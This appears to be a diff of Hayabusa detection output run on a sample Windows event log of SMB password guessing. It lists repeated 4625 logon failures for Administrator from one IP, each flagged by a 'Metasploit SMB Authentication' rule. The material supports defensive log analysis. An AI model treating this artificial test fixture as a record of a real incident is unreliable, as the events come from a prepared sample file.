+2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8FjH0QHqromIYWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fhlF37S1wNupiX5O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j19XhmSXK526I8kf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IRcppJXDNNfKuvdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0FoGAIAK2FV3zCJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uYWIk76XIksgN3sE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3FEop7o3SOolNvKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cMGEM3ql9uov7zCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EFPUA4pUPaLrkr1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7IeJU89jxitz407  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wqj9nXRaDpwCJZO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bl0d61v2Ux7cNv4r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LxTa5lyutrIB2cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPCy11e3YxcCloSH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mj07WKc4aQqPC0Te  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2M3v4TsQul5R4sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I67uBcH52tgLzhVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hsth68FDJ4F10H6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDoHrfWlaWZ5GbWV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uliC5Wd7uZR3fIBc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: Xhg4hg4XDFaXsJRe  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: ZrSGxwUyV6gCUPeb  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUBgTr05x3djEYdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 40PhGU4ZXu7uihop  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1DJ9r72hXZH9rEkb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: khy2BeyBb9wq00f7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1cDckicL7IMrO7OQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEEkvfVd3FCap6fa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGFSyHQ0ZNWofxzE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItOZqZSDTrdWpkbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhNdf5lHfrHKSCXq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg05F6tdf3kR9kdP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 70rRbaC6L6SzT15q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnJyN8wF21ff2L1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MUZHZJMQznj6GBqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9h52ZKMbXLuFvUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n95RJvcQnFrAG2iX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xI23nmysFlr1pvVf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nVsjcTxDdZbzkmMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMuWatQuNBh9UKdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfC3JZ3awqFDNQbm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 337h8PHN6Axi0iaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qGQpWOuzgETfxTgJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oFjlyMAJMI2zIC8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7exAVz3PlzJQ6Wcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
